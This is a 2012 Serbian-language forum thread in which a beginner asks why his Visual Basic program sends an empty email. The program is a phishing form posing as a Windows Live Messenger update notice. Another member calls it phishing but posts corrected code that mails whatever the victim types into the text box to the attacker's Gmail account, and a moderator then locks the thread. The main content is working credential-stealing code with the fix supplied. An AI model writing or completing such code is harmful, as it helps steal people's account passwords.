Prijava na forum:
Ime:
Lozinka:
Prijavi me trajno:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:

ConQUIZtador
Trenutno vreme je: 26. Sep 2025, 13:29:45
nazadnapred
Korisnici koji su trenutno na forumu 0 članova i 0 gostiju pregledaju ovu temu.


Tema za pitanja
o SMF forumu, phpBB2 i phpBB3 forumu, Wordpress i Joomla CMS sistemima!

Za vecinu drugih pitanja nacicete odgovor citajuci Top teme!

Idi dole
Stranice:
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
Tema: POmoc Visual Basic  (Pročitano 831 puta)
23. Mar 2012, 21:35:27
Pocetnik

Zodijak
Pol
Poruke 11
Browser
Mozilla Firefox 4.0
Potrebna mi jepomoc sa aplikacijom.
Kada u Textbox-u upisem podatke i idem sent stize mi prazan email...U cemu je problem ???
Evo Coda :

Imports System.Net.Mail
Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim smtpserver As New SmtpClient()
        Dim mail As New MailMessage()
        smtpserver.Credentials = New Net.NetworkCredential("Your mail", "password")
        smtpserver.Port = 587
        smtpserver.Host = "smtp.gmail.com"
        smtpserver.EnableSsl = True
        mail.From = New MailAddress("Your mail")
        mail.Subject = "Hack: "
        mail.To.Add("Your mail")
        mail.Body = "username: ""password"
        smtpserver.Send(mail)
        MsgBox("Sorry,You have been dissconnected from server, ther are new version of Windows live messenger , please download it.")
    End Sub

    Private Sub TextBox1_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles TextBox1.TextChanged

    End Sub
End Class
IP sačuvana
social share
Pogledaj profil
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Zvezda u usponu


Zodijak Taurus
Pol Muškarac
Poruke 1348
Zastava Сурдук
OS
Windows 7
Browser
Chrome 17.0.963.83
mob
Nokia N97 Mini
1. Mani se hack-a... Prvo nauci jezik pa onda pravi phishere... Nije fora da ti neko drugi napravi... Smile
2. Nije ovo pravo mesto za temu...
3. Sta ce ti TextBox1.TextChanged?
4. Evo ti kod:
Kod:
Imports System.Net.Mail
Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Dim smtpserver As New SmtpClient()
        Dim mail As New MailMessage()
        smtpserver.Credentials = New Net.NetworkCredential("email", "pass")
        smtpserver.Port = 587
        smtpserver.Host = "smtp.gmail.com"
        smtpserver.EnableSsl = True
        mail.From = New MailAddress("email")
        mail.Subject = "Hack: "
        mail.To.Add("email")
        mail.Body = TextBox1.Text
        smtpserver.Send(mail)
        MsgBox("Sorry,You have been dissconnected from server, ther are new version of Windows live messenger , please download it.")
    End Sub
End Class
IP sačuvana
social share
Pogledaj profil Skype
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Supervizor foruma
Svedok stvaranja istorije


necu da ti kazem, chelavi...

Zodijak Libra
Pol Muškarac
Poruke 22023
Zastava La45.2590  Lo19.8330
OS
Windows 7
Browser
Mozilla Firefox 11.0
mob
Apple iPhone 12, S21
Aham...
Mislim da cemo ovde turiti jedan kljucic  Smile


[lock]
IP sačuvana
social share
- A robot may not injure a human being or, through inaction, allow a human being to come to harm
- A robot must obey the orders given to it by human beings, except where such orders would conflict with the First Law
- A robot must protect its own existence as long as such protection does not conflict with the First or Second Laws
Pogledaj profil
 
Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Idi gore
Stranice:
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
Trenutno vreme je: 26. Sep 2025, 13:29:45
nazadnapred
Prebaci se na:  
Upozorenje:ova tema je zaključana!
Samo administratori i moderatori mogu odgovoriti.
web design

Forum Info: Banneri Foruma :: Burek Toolbar :: Burek Prodavnica :: Burek Quiz :: Najcesca pitanja :: Tim Foruma :: Prijava zloupotrebe

Izvori vesti: Blic :: Wikipedia :: Mondo :: Press :: Naša mreža :: Sportska Centrala :: Glas Javnosti :: Kurir :: Mikro :: B92 Sport :: RTS :: Danas

Prijatelji foruma: Triviador :: Nova godina Beograd :: nova godina restorani :: FTW.rs :: MojaPijaca :: Pojacalo :: 011info :: Burgos :: Sudski tumač Novi Beograd

Pravne Informacije: Pravilnik Foruma :: Politika privatnosti :: Uslovi koriscenja :: O nama :: Marketing :: Kontakt :: Sitemap

All content on this website is property of "Burek.com" and, as such, they may not be used on other websites without written permission.

Copyright © 2002- "Burek.com", all rights reserved. Performance: 0.069 sec za 16 q. Powered by: SMF. © 2005, Simple Machines LLC.